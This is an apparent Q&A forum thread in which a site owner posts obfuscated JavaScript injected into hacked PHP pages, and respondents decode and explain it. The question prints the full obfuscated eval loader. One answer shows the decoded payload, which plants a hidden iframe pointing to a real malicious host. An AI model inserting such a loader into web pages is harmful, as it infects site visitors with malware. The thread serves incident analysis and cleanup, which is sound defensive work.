# Site was just attacked and javascript was injected at the header, what does it mean?

Tags: javascript, security

One of our websites was attacked recently where multiple php files were modified. This modification injected javascript at the top of the page but after base64 decoding all of it I came across the following and I have no clue how to proceed.

Does anyone have any experience in this stuff and is there anyway to figure out exactly what they were trying to achieve?

```
<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;573!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>
```

Beautified:

```
i = 0;
try {
    avasv = prototype;
} catch (z) {
    h = "harCode";
    f = ['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');
    v = "e" + "va";
}
if (v) e = window[v + "l"];
try {
    q = document.createElement("div");
    q.appendChild(q + "");
} catch (qwg) {
    w = f;
    s = [];
}
r = String;
z = ((e) ? h : "");
for (; 573 != i; i += 1) {
    j = i;
    if (e) s = s + r["fromC" + ((e) ? z : 12)](w[j] * 1 + 42);
}
if (v && e && r && z && h && s && f && v) e(s);
```

Comment: `e` is `window['eval']`.  Change `e(s)` to `console.log(s)` to see the code it's `eval`ing.  I did it, it's: http://pastebin.com/YnrcNVc3

Comment: You might also run this past the gurus at security.se.

Comment: @Rocket you should make that an answer. Looks good

Comment: I was just contacted by a client that has this on several hosted sites on a Windows server, at least one of the sites is using FrontPage - so this is not just an exploit for PHP driven sites.

Answer (score 19, accepted):

I looked at this code, it's kinda crazy.

It starts with `try{avasv = prototype;}`, which obviously fails.  Then it makes some variables.

`f` is an array of numbers (length 573).  `z` is `harCode`.  Towards the end, there's `"fromC" + ((e) ? z : 12)`.  This creates `fromCharCode` (`String.fromCharCode`), which is used with the array of numbers, `f` (after adding `42` to each number).  This seems to create a string to be `eval`ed.

It gets `eval`ed like this:

```
v = "e" + "va";
if (v) e = window[v + "l"];
```

As you can see `e` is `window['eval']`, or simply `eval`.

So, if you replace:

```
if (v && e && r && z && h && s && f && v) e(s);
```

with:

```
if (v && e && r && z && h && s && f && v) console.log(s);
```

Then, you can see what the purpose of this code was.  I did this, and here is what was output:

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://kyubdyyyb.lookin.at/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://kyubdyyyb.lookin.at/?go=2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

I don't know what `http://kyubdyyyb.lookin.at/?go=2` is, so *I suggest you **don't** go there*.

There seem to be a lot of redundant checks here (like `(e) ? z : 12`, `e` will never be false).  Probably just to make the code more confusing.

Comment: remove the link pls. its dangerous

Comment: @ajax333221: I warned people not to go there.

Comment: Good job decoding that! +1.  Looks like a typical XSS or XSRF attack using a hidden iFrame.   :-P

Comment: "I don't know what ... is" well I know and it is blocked because trying to install malicious code, its really dangerous. Nobody (except probably the OP) cares to see exactly the original URL, for the rest 99.999999999% of the community is just pointless and some of those will visit it (like I did just for curiosity) and he already saw it, and even if he don't, you already provided info on how to get it

Comment: @ajax333221: The URL isn't pointless.  I added it in case someone recognizes it, or knows what it is.  It may be useful to someone.

Comment: @ajax333221: She'd send the hackers to the MOOOOOOOOOOOOOOOOOOOOOOOON!

Comment: Man you guys rock, I can't believe how quickly you guys figured it all out :) +1s to all!

Comment: @ajax333221: No, but Discord would.

Answer (score 10):

I know this isn't a direct answer, but it looks like the achieved what they wanted to do.  Inject arbitrary script that would run on your website, to do something malicious.

Googling for "avasv=prototype" essentially just lists a ton of infected sites, but the few non-malicious looking hits indicate that this is a script unpacker.

What they were trying to achieve isn't the important thing. They achieved it.  They placed a malicious script in your web app, and from there, they can steal sensitive data from your server and your visitors, and thanks to XmlHttp, post it back to their own web servers.  The important thing is how you're going to clean it up before more of your visitors get compromised, and how you're going to code to prevent against XSS and XSRF in the future.

Hopefully, you've got source control, and can revert your site to a pre-infected state.  That would be order of business #1.

If you haven't heard of it, I strongly recommend regular visits and learning at http://www.OWASP.org as an excellent way to learn how to prevent future occurrences.

---

***One last note, even if your site has no sensitive data in it, you're still putting your customers at risk if they log into your  site.***

JavaScript can potentially be used to gather their username/password combination, which they can then use against other sites and potentially steal customer's information from *those* sites.  (Depending on how your site is coded)  So cleaning up and protecting your visitors is absolutely order of business #1 even if it means shutting down your site for "maintenance"

[image: It'll be hilarious the first few times this happens.]

Finally, there's some good advice from Google in their article "[My site's been hacked. Now what?"](http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html)

Comment: Thanks for the tips. We did clean up the infected code, change write permissions and I'm going through various steps to try and make sure this doesn't happen again. I'm relatively new here and I'm not aware of most of the projects these guys have worked on so this is an on going process. As soon as I get SSH access I will try and search for  similar code and suspicious files. Thanks again :)

Answer (score 2):

I got this critter too and it was perplexing for a while, because grepping for identifying strings like avasv=prototype turned up some results but removing them didn't clean out the infection. To clarify the OP, it turns out it's originally injecting some more interesting PHP, usually in index.php files. You'll see a php eval(base64_decode(...)) in them on line 1.

What this code does, and I won't bother reposting because it's trivial, is decode and evaluate a base64 string containing some php. Inside that code is a basic UA-checker which looks for strings of uninfectable browser/OS combinations (mac, linux, google chrome browser, etc) and search spiders/bots. This is also why you won't see the malicious javascript if you try looking in certain browser/OS combos or use curl/wget. If it doesn't find one of its listed UA strings it then decodes and echoes the script seen in the OP, which is also base64 encoded.

So what you want to do to root it out is grep for "eval(base64_decode(". There's no legitimate purpose for that particular combination of functions that I can think of, so you should be able to track it down pretty quick and wipe it out. That won't fix whatever your original point of infection was of course.

Comment: I got the javascript from decoding the eval at the top of the index pages. We were able to purge the server of all of them, it took a while for me to find it but they made it from a user upload script that was completely unprotected. I plugged the hole and crossed my fingers and after a few attempts (according to the access logs) they failed :)

Comment: Nice, specific info for this one. +1 for this, I'm sure it will be helful to future visitors, too!